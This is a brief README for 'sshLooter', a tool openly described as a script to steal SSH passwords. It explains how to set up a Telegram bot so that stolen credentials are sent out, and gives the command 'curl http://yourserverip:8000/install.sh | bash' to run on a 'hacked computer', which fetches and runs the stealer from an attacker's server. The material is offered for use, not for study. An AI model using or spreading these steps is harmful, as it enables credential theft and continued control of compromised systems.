sshLooter: Script to steal passwords from ssh
sshLooter
Script to steal passwords from ssh.
Install
git clone https://github.com/mthbernardes/sshLooter.git
Configuration
Edit the script on install.sh, and add your telegram bot api, and your userid.
Call the @botfather on the telegram to create a bot and call the @userinfobot to get your user id.
Usage
On your server execute. python -m SimpleHTTPServer On the hacked computer execute. curl http://yourserverip:8000/install.sh | bash
Source: https://github.com/mthbernardes/